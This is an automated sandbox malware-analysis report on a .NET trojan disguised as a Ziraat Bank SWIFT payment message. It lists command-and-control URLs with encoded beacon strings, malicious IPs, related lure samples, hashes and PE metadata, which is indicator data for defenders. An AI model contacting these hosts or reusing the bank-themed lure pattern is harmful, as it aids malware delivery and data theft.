                    http://www.thetrendsinfo.com/qmpa/?3f-T6nI=8j1KE/HWtHcnH+pEPE5HkfDOmxDyQ368aF2j+bbJwew9gPbmW2dVDlZv4ybx5W4m8jPtBYTEvz/PBOnDTGQZn8CJHCh1MhyDPKi16ua84ged&j6=hfNTtrue
                    • Avira URL Cloud: malware
                    unknown
                    http://www.thetrendsinfo.com/qmpa/true
                    • Avira URL Cloud: malware
                    unknown
                    www.erwgcb.top/qmpa/true
                    • Avira URL Cloud: safe
                    low
                    http://www.oaksinstitute.net/qmpa/true
                    • Avira URL Cloud: malware
                    unknown
                    http://www.notarpucarhr.com/qmpa/?3f-T6nI=EgIWtG18ZIzAqtaO1OmvkFLdPjhKt8Mp7J5Y1fxWkEB6Q9kPLkR881s923Q+G4W9S+aNob6MQv0YuDJ73eh9wGmaMy0jmQVwd4+wO+lCGFJf&j6=hfNTtrue
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.vodien.com/cscript.exe, 0000000A.00000002.515404559.0000000006DD0000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000002.514899513.0000000004F1A000.00000004.10000000.00040000.00000000.sdmpfalse
                      high
                      https://duckduckgo.com/chrome_newtabcscript.exe, 0000000A.00000003.457811640.0000000000849000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.drfalse
                        high
                        http://www.apache.org/licenses/LICENSE-2.0Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.comZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.com/designersGZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/ac/?q=q3W1-4699.10.drfalse
                                high
                                http://www.fontbureau.com/designers/?Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bTheZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icocscript.exe, 0000000A.00000003.457811640.0000000000849000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.drfalse
                                    high
                                    http://www.fontbureau.com/designers?Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.litespeedtech.com/error-pagecscript.exe, 0000000A.00000002.514784229.0000000004BF6000.00000004.10000000.00040000.00000000.sdmpfalse
                                        high
                                        http://www.vodien.com/singapore-email-hosting.phpcscript.exe, 0000000A.00000002.515404559.0000000006DD0000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000002.514899513.0000000004F1A000.00000004.10000000.00040000.00000000.sdmpfalse
                                          high
                                          https://search.yahoo.com?fr=crmas_sfpfcscript.exe, 0000000A.00000003.457811640.0000000000849000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.drfalse
                                            high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=q3W1-4699.10.drfalse
                                              high
                                              http://www.tiro.comZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcscript.exe, 0000000A.00000003.457811640.0000000000849000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.drfalse
                                                high
                                                http://www.fontbureau.com/designersZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.goodfont.co.krZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=cscript.exe, 0000000A.00000003.457811640.0000000000849000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.drfalse
                                                    high
                                                    http://www.carterandcone.comlZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.sajatypeworks.comZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.typography.netDZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://ac.ecosia.org/autocomplete?q=q3W1-4699.10.drfalse
                                                      high
                                                      https://search.yahoo.com?fr=crmas_sfpcscript.exe, 0000000A.00000003.457811640.0000000000849000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.drfalse
                                                        high
                                                        http://www.fontbureau.com/designers/cabarga.htmlNZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn/cTheZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/staff/dennis.htmZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://fontfabrik.comZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.founder.com.cn/cnZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers/frere-jones.htmlZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.jiyu-kobo.co.jp/Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/DPleaseZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers8Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.fonts.comZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.sandoll.co.krZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.urwpp.deDPleaseZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.zhongyicts.com.cnZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.sakkal.comZiraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=q3W1-4699.10.drfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  68.66.216.12
                                                                  thetrendsinfo.comUnited States
                                                                  55293A2HOSTINGUStrue
                                                                  103.11.189.189
                                                                  www.oaksinstitute.netSingapore
                                                                  58621VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSGtrue
                                                                  141.136.43.229
                                                                  notarpucarhr.comLithuania
                                                                  207291SENDER-ASLTtrue
                                                                  38.239.92.131
                                                                  www.multimediapages.comUnited States
                                                                  174COGENT-174UStrue
                                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                  Analysis ID:750683
                                                                  Start date and time:2022-11-21 10:56:42 +01:00
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 10m 49s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Sample file name:Ziraat Bankasi Swift Mesaji20221121.exe
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:12
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:1
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@4/2@5/4
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HDC Information:
                                                                  • Successful, ratio: 42.3% (good quality ratio 36.6%)
                                                                  • Quality average: 71.2%
                                                                  • Quality standard deviation: 33.8%
                                                                  HCA Information:
                                                                  • Successful, ratio: 95%
                                                                  • Number of executed functions: 66
                                                                  • Number of non-executed functions: 153
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                  TimeTypeDescription
                                                                  10:57:45API Interceptor2x Sleep call for process: Ziraat Bankasi Swift Mesaji20221121.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  68.66.216.12DOC007653647953-20221511.exeGet hashmaliciousBrowse
                                                                  • www.thetrendsinfo.com/qmpa/?oL08=8j1KE/HWtHcnH+pEPE5HkfDOmxDyQ368aF2j+bbJwew9gPbmW2dVDlZv4ybx5W4m8jPtBYTEvz/PBOnDTGQUrcGVKmlLPSXsFA==&s2MtM=5jBl5P7PLN
                                                                  Ziraat Bankasi Swift Mesaji20221109 (2).exeGet hashmaliciousBrowse
                                                                  • www.thetrendsinfo.com/qmpa/?q4IpMxR=8j1KE/HWtHcnH+pEPE5HkfDOmxDyQ368aF2j+bbJwew9gPbmW2dVDlZv4ybx5W4m8jPtBYTEvz/PBOnDTGQUrf2IHB5LOSfkFA==&8pHd=PL04n4I0hpct6T9
                                                                  Ziraat Bankasi Swift Mesaji20221109.exeGet hashmaliciousBrowse
                                                                  • www.thetrendsinfo.com/qmpa/?EN=8j1KE/HWtHcnH+pEPE5HkfDOmxDyQ368aF2j+bbJwew9gPbmW2dVDlZv4ybx5W4m8jPtBYTEvz/PBOnDTGQUrf2IHB5LOSfkFA==&jR-l=6lNTxBMP
                                                                  37AMC- PFI.exeGet hashmaliciousBrowse
                                                                  • www.cpfhomeinspections.com/sa/?bL0HR=uQ8o4AsCGiiEzrfLn1s5mgfnq/Xc15pOK2PKi7FLOa4uaO24awOKXmK70PB//jVmdnu7+LYQliXGfXHghM6e&r0Gl=Z0GlX
                                                                  103.11.189.189DOC007653647953-20221511.exeGet hashmaliciousBrowse
                                                                  • www.oaksinstitute.net/qmpa/?oL08=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImqbF2d7jI61SlZkw==&s2MtM=5jBl5P7PLN
                                                                  Ziraat Bankasi Swift Mesaji20221111.exeGet hashmaliciousBrowse
                                                                  • www.oaksinstitute.net/qmpa/?SpQL4=MFNdYVRHNTkPAVX0&1blTn4=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImnQleN8W8E9RZ0lg==
                                                                  Ziraat Bankasi Swift Mesaji20221110.exeGet hashmaliciousBrowse
                                                                  • www.oaksinstitute.net/qmpa/?6li=Id0T0NIH-PmpC&yRExXbV=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImnXlyB2HME2hA2u33jFcxbHUjt
                                                                  Ziraat Bankasi Swift Mesaji20221109 (2).exeGet hashmaliciousBrowse
                                                                  • www.oaksinstitute.net/qmpa/?8pHd=PL04n4I0hpct6T9&q4IpMxR=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImqbGGA2EU60StRkw==
                                                                  Ziraat Bankasi Swift Mesaji20221109.exeGet hashmaliciousBrowse
                                                                  • www.oaksinstitute.net/qmpa/?EN=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImqbGGA2EU60StRkw==&jR-l=6lNTxBMP
                                                                  3cGH9Bakuq.exeGet hashmaliciousBrowse
                                                                  • www.rangerbuddys.com/scb0/?sVSH=CPDL8v1&IN9dgxBh=J7r5qQFPY3cJvABn1Gs7ze2qtK7SOzbffr49jA2eoV1JiGZLpH7+KoOsOPA+gXWondlu
                                                                  Additional DHL shipment Delivery Parcel.exeGet hashmaliciousBrowse
                                                                  • www.milliemaiden.com/nehc/?D4f8=fRmXCLc0WnbXAL&Jzu8ZXYx=NPZkSMI47v3URZjVQiwyZHYkMaBFahS78nDaSEbkZq6FH+5mxG+RbiddKz/jSroxTopO
                                                                  42RFQ Requirements for IPREN BV Belgium.exeGet hashmaliciousBrowse
                                                                  • www.expatysingapore.com/i8/?y6Ql=4fkaZCzLhJxiUJleuO3V+pXCoYfSV1Mc0lj0VsIYNj7neo0pFDrST1X9HblvKCnn61VkJVI17dvfVmcYVQ7hJw==&9rUPB=1b9L_r
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  wws-proxy-prod-linux2.us-east-1.elasticbeanstalk.comOrden de Compra -SA8436, pdf.exeGet hashmaliciousBrowse
                                                                  • 52.20.53.66
                                                                  DOC007653647953-20221511.exeGet hashmaliciousBrowse
                                                                  • 3.209.28.237
                                                                  Ziraat Bankasi Swift Mesaji20221109 (2).exeGet hashmaliciousBrowse
                                                                  • 52.20.53.66
                                                                  jQegXWWQ3V.exeGet hashmaliciousBrowse
                                                                  • 34.203.6.3
                                                                  PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                  • 52.5.240.220
                                                                  SecuriteInfo.com.W32.AIDetect.malware2.21733.exeGet hashmaliciousBrowse
                                                                  • 52.5.240.220
                                                                  www.oaksinstitute.netDOC007653647953-20221511.exeGet hashmaliciousBrowse
                                                                  • 103.11.189.189
                                                                  Ziraat Bankasi Swift Mesaji20221115.exeGet hashmaliciousBrowse
                                                                  • 103.11.189.189
                                                                  Ziraat Bankasi Swift Mesaji20221111.exeGet hashmaliciousBrowse
                                                                  • 103.11.189.189
                                                                  Ziraat Bankasi Swift Mesaji20221110.exeGet hashmaliciousBrowse
                                                                  • 103.11.189.189
                                                                  Ziraat Bankasi Swift Mesaji20221109 (2).exeGet hashmaliciousBrowse
                                                                  • 103.11.189.189
                                                                  Ziraat Bankasi Swift Mesaji20221109.exeGet hashmaliciousBrowse
                                                                  • 103.11.189.189
                                                                  Ziraat Bankasi Swift Mesaji,pdf2.exeGet hashmaliciousBrowse
                                                                  • 103.11.189.189
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  A2HOSTINGUSpayment_remittance_copy_receipt_pdf_file.exeGet hashmaliciousBrowse
                                                                  • 70.32.23.81
                                                                  DOC007653647953-20221511.exeGet hashmaliciousBrowse
                                                                  • 68.66.216.12
                                                                  Snedkerlims.exeGet hashmaliciousBrowse
                                                                  • 85.187.128.35
                                                                  WGwBG6VUfG.exeGet hashmaliciousBrowse
                                                                  • 85.187.143.53
                                                                  http://carameldoha.comGet hashmaliciousBrowse
                                                                  • 70.32.24.132
                                                                  file.exeGet hashmaliciousBrowse
                                                                  • 85.187.143.53
                                                                  Ziraat Bankasi Swift Mesaji20221109 (2).exeGet hashmaliciousBrowse
                                                                  • 68.66.216.12
                                                                  Ziraat Bankasi Swift Mesaji20221109.exeGet hashmaliciousBrowse
                                                                  • 68.66.216.12
                                                                  2UGFcVzLdR.exeGet hashmaliciousBrowse
                                                                  • 85.187.132.177
                                                                  7OgGOqiXd3.exeGet hashmaliciousBrowse
                                                                  • 85.187.132.177
                                                                  ScanDocumentsfiles00204865030303388493335950.exeGet hashmaliciousBrowse
                                                                  • 85.187.132.177
                                                                  9H21pBlz0m.exeGet hashmaliciousBrowse
                                                                  • 85.187.132.177
                                                                  image2021042GFREDS12322ERDQ1DOC03027382DOC202205.exeGet hashmaliciousBrowse
                                                                  • 85.187.132.177
                                                                  https://na7dse.web.app/anW1anr9sillasa510h3lg0h30h3nikd07r9s0h3nW1Get hashmaliciousBrowse
                                                                  • 85.187.128.31
                                                                  ydbWyoxHsd.exeGet hashmaliciousBrowse
                                                                  • 85.187.148.2
                                                                  http://70.32.23.26Get hashmaliciousBrowse
                                                                  • 70.32.23.26
                                                                  https://aebracelets.com/iil/manulifeGet hashmaliciousBrowse
                                                                  • 185.146.22.233
                                                                  https://l.e.allegiant.com/rts/go2.aspx?h=157506&tp=i-16EB-Fu-4wd-B5EDi3-1o-70Wp2-1c-qCzy-l7ndr2xLVk-6wL0Q&x=protectdirect.web.app/barryd07d0h3ana51first0h3ntari0h3d07r9s0h3nW1Get hashmaliciousBrowse
                                                                  • 85.187.128.31
                                                                  https://bidjat.e-9.co/ess/caprariGet hashmaliciousBrowse
                                                                  • 68.66.226.108
                                                                  http://m7aq52.market-maker.fr.brunswickpnp.com/:x:/#thomas.bedin@market-maker.frGet hashmaliciousBrowse
                                                                  • 68.66.226.89
                                                                  No context
                                                                  No context
                                                                  Process:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1216
                                                                  Entropy (8bit):5.355304211458859
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                  MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                  SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                  SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                  SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                  Process:C:\Windows\SysWOW64\cscript.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                  Category:modified
                                                                  Size (bytes):94208
                                                                  Entropy (8bit):1.2889923589460437
                                                                  Encrypted:false
                                                                  SSDEEP:192:Qo1/8dpUXbSzTPJP/6oVuss8Ewn7PrH944:QS/inXrVuss8Ewn7b944
                                                                  MD5:7901DD9DF50A993306401B7360977746
                                                                  SHA1:E5BA33E47A3A76CC009EC1D63C5D1A810BE40521
                                                                  SHA-256:1019C8ADA4DA9DEF665F59DB191CA3A613F954C12813BE5907E1F5CB91C09BE9
                                                                  SHA-512:90C785D22D0D7F5DA90D52B14010719A5554BB5A7F0029C3F4E11A97AD72A7A600D846174C7B40D47D24B0995CDBAC21E255EC63AC9C07CF6E106572EA181DD5
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.3615393017445685
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:Ziraat Bankasi Swift Mesaji20221121.exe
                                                                  File size:707584
                                                                  MD5:775849a9c9b3cbfd14a9920690f62859
                                                                  SHA1:aaaa3339aea81358088b6ac6ba82ad1032128e98
                                                                  SHA256:f7f25e706279b7b590b49e40358db78ce5e8a3d65b765de97a7c964a81bf8881
                                                                  SHA512:76678fbb422a22139b340112e6e6473016312cf3a0bd82c59051b5461e305aee21a190cd60588ba43bbae538b5ee9df6a570172a61a82ce8c659ca66becd4635
                                                                  SSDEEP:12288:1PMsbBtXrq1/uP911a5HyWmoFagQHamKRyDaUoSQLR79Ig4k9oIKAChXsOL/GXhF:q1GF1GrgxHQAsoNbhC+L74mBfNUstzo
                                                                  TLSH:41E4174F2B7FDEF0EA245DFB121457039D7221DABA8ACA7887944BC660F1B0C5B71825
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....zc..............0.............>.... ........@.. .......................@............@................................
                                                                  Icon Hash:00828e8e8686b000
                                                                  Entrypoint:0x4ae23e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x637AE609 [Mon Nov 21 02:44:25 2022 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xae1ec0x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x3a8.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
